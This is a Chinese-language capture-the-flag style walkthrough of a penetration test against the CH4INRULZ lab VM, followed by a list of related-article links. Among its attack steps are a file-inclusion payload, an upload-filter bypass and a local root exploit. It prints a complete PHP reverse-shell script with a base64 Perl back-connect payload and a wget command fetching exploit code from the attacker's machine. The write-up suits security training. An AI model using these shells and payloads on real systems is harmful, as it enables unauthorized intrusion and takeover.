CH4INRULZ靶机渗透测试
CH4INRULZ靶机渗透测试
- 环境
- 工具
- 流程
环境
kali攻击机
192.168.1.105
靶机
192.168.1.103
工具
hackbar,netdiscover,nmap,searchsploit,dirb,御剑,在线解码工具,wget
流程
首先对目标网段进行主机发现扫描然后扫端口
发现有80端口上去也没有发现什么收获
回来目录爆破发现几个目录啥也没有就
http://192.168.1.103/development
这个目录弹了个登录框可咱也没有账号密码啊
换御剑继续扫
看见一个bak访问下载下载后发现里面有账号和一个hash加密的密码应该就是上面那个的账号密码了
账号密码提出来放在新建的hack文件里用john解密
账号frank密码frank!!!登录上去得到一个目录uploader
访问一下一个文件上传界面凭经验应该有文件上传漏洞但不知道路径白搭
反过头来收集8011端口的信息dirb爆目录得到http://192.168.1.103:8011/api/
访问得到几个目录
只有files_api.php可以访问
第二句话说了要file可能存在文件包含漏洞先用get方式失败
post方式提交brupsuite截断分析一下
成功返回了/etc/passwd信息存在文件包含漏洞
看一下apache服务器配置文件
构造伪代码请求拿uploader.php的源码
"file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" "http://10.0.3.130:8011/api/files_api.php"
解码得到源码得到上传路径
kali本地找个shell脚本
改下参数为kali ip 和设置端口号
后缀改为gif
上传
上传失败
用brupsuite截断加上文件头GIF89再发送上传成功
查看一下成功上传了
开启本地监听
然后访问该文件
但是没有返回应该是脚本问题把被过滤了
在网上又找了一个脚本大家可以借鉴
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
改好ip端口再来方法一样
成功返回了shell
用python脚本优化终端
python -c 'improt pty; pty.spawn("/bin/bash")
uname -a 得到内核版本在searchploit上搜到本地提权的脚本15258.c
把脚本cp到/var/www/html下然后用
nohup python -m SimpleHTTPServer 8000 &
把本目录放在8000端口下
靶机用wget http://192.168.1.107:8000/15258.c(在tmp文件夹下下载该文件夹权限较松)编译到文件hack
gcc 15258.c -o hack
再chmod 777 hack
赋予运行权限
然后运行./hack
成功拿到root权限
CH4INRULZ靶机渗透测试相关推荐
- DC-2靶机渗透测试流程
目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. 四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
- 靶机渗透测试(Tre: 1)
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...
- DC-3靶机渗透测试
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
- 靶机渗透测试(unknowndevice64: 1)
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...
- Eric靶机渗透测试通关全教程
环境准备 联不联网无所谓,主要是要在同一网段下 靶机:Eric 攻击机:Kali (192.168.56.102) 渗透目标 拿到普通用户下的flag 拿到root用户下的flag 渗透测试实战 已知 ...
- DC-5靶机渗透测试
渗透测试 靶机所需环境 信息收集 漏洞利用 上传一句话shell 蚁剑连接 权限提升 文件生成 文件一 文件二 文件三 获取root权限 靶机所需环境 目标靶机:DC-5(192.168.160.15 ...
- Eric靶机渗透测试
Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机:eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 ...
- DC-3靶机 渗透测试
DC-3 查看靶机mac地址 获取IP地址 Nmap JooScan sqlmap john 上传Webshell nc反弹 提权 DC-3只有一个目标获得root权限,拿到flag. 查看靶机mac ...
最新文章
- python logging.getlogger_logging.getLogger与logger的父子关系
- Spring Aop实例
- java题目不会做那么解答_有几道JAVA的题目不会做 哪位高手来解答一下!谢
- 所有计算机都可以安装win7,几种安装win7系统的方法介绍
- 业务逻辑 : forex mlm
- 2、Jupyter Notebook 快速入门
- 余额宝技术架构及演进
- 【iOS】打印方法名
- phpexcel读取输出操作
- Mini-project # 1 - Rock-paper-scissors-lizard-Spock
- 数学和计算机竞赛,数学奥赛VS信息学奥赛,数学基础扎实的孩子
- Cisco2811路由器的首次接触
- 微信广告转化统计java,百度推广oCPC微信号复制转化次数统计系统数据接口
- KDF- key derivation function
- Linux如何测试驱动性能,掌握 Linux PC 性能之基准测试
- 解除OA系统Word文档不能修改编辑问题
- 使用openssl转换pem为pfx证书
- 企业网络和家庭网络区别
- 自己实现一个Spring 框架
- XCUIApplication API